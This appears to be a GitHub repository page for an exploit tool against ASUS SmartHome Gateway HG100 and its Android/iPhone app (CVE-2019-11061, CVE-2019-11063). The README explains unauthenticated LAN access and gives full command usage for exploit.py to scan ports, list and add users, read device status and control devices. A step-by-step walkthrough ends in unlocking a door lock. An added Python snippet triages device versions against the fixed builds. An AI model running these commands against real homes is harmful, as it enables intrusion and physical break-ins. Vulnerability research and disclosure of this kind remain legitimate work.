ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063
Type Name Latest commit message Commit time
images add description Apr 1, 2019
.gitignore Initial commit Mar 29, 2019
DeviceInfo.py cmd done Apr 1, 2019
README.md add Affected products description Aug 27, 2019
SmartHomeExploit.py add https description Jul 25, 2019
__init__.py scan done Mar 29, 2019
exploit.py https support May 26, 2019

README.md

ASUS-SmartHome-Exploit

CVE IDs

CVE-2019-11061 : Broken access control in HG100

Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09

CVE-2019-11063 : Broken access control in SmartHome app

Affected products : ASUS SmartHome Android APP version < 3.0.45_190701
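
For triaging an inventory against the two "Affected products" thresholds above, the following is an added example (not part of the original repository). The product keys, host names and inventory rows are assumptions made for illustration; only the version thresholds and the two older build strings come from this README.

```python
import re

# Fixed-version thresholds copied from the "Affected products" lines above.
# The product keys ("hg100", "android_app") are names chosen for this example.
FIXED = {
    "hg100": ("CVE-2019-11061", "4.00.09"),
    "android_app": ("CVE-2019-11063", "3.0.45_190701"),
}


def parse_version(text):
    """Turn '4.00.06' or '3.0.42_190515' into a tuple that compares numerically."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*(_\d+)?", text):
        raise ValueError(f"unrecognised version string: {text!r}")
    dotted, _, build = text.partition("_")
    return tuple(int(part) for part in dotted.split(".")), int(build or 0)


def triage(inventory):
    """Return (name, cve, status) per row; status is affected / fixed / manual."""
    findings = []
    for name, product, version in inventory:
        cve, fixed = FIXED.get(product, (None, None))
        if fixed is None:
            findings.append((name, None, "manual"))  # product not covered here
            continue
        try:
            affected = parse_version(version) < parse_version(fixed)
        except ValueError:
            findings.append((name, cve, "manual"))  # version unreadable: check by hand
            continue
        findings.append((name, cve, "affected" if affected else "fixed"))
    return findings


# Constructed sample inventory; host names are invented. The two older version
# strings are the builds the 2019/5/15 note in this README says are still vulnerable.
INVENTORY = [
    ("gw-hall", "hg100", "4.00.06"),
    ("gw-lab", "hg100", "4.00.10"),
    ("phone-a", "android_app", "3.0.42_190515"),
    ("phone-b", "android_app", "3.0.45_190701"),
    ("gw-attic", "hg100", "n/a"),
]

if __name__ == "__main__":
    for name, cve, status in triage(INVENTORY):
        print(f"{name:10} {status:9} {cve or '-'}")
```

Versions are compared numerically per component, so "4.00.10" sorts after "4.00.09", and rows with an unreadable version or an unlisted product are returned as "manual" rather than silently passed.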

Description

If the attacker is on the same internal network as the HG100 or as a mobile device running the companion app (Android or iPhone), the attacker can send control requests to them.

The attacker then does not need any authentication to do the following:
1. Get all user names that have been added to the HG100.
2. Get information on all devices under the SmartHome Gateway (HG100).
3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.

The following needs a password (4 to 6 digits, default: "0000"):
1. Add users to the HG100.

Exploit usage:

scan exploitable port :

usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

send command to target :

usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Note: On 2019/5/15 ASUS released an update for the SmartHome app (3.0.42_190515) and the Gateway (4.00.06) that added SSL to the HTTP service, but this vulnerability still exists. With this update, you need to specify the protocol when using the "cmd" argument. For example:
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Use example:

Step1:

Scan a mobile device (with the companion app for Android or iPhone installed) for the exploitable port:

[Screenshot: app port]

P.S. The -v option lists the users that have been added to the HG100.

or

Scan the HG100 for the exploitable port:

[Screenshot: HG100 port]

Step2:

Get all users that have been added to the HG100:

[Screenshot: list user]

or add a new one:

[Screenshot: add user]

Note: use https://10.42.50.166:8083 for "cmd" argument.
For example:

$ ./exploit.py cmd https://10.42.50.166:8083 -u

Step3:

Get information on all devices under the SmartHome Gateway:

[Screenshot: list device]

P.S. If the --user option is not set, the first user in the HG100 is selected automatically (because no password is needed).

Compare with app:


Step4:

Control (unlock) the DoorLock:

[Screenshot: ctrl device]

P.S. The value 1028 comes from the -l option (Step3).

Result:
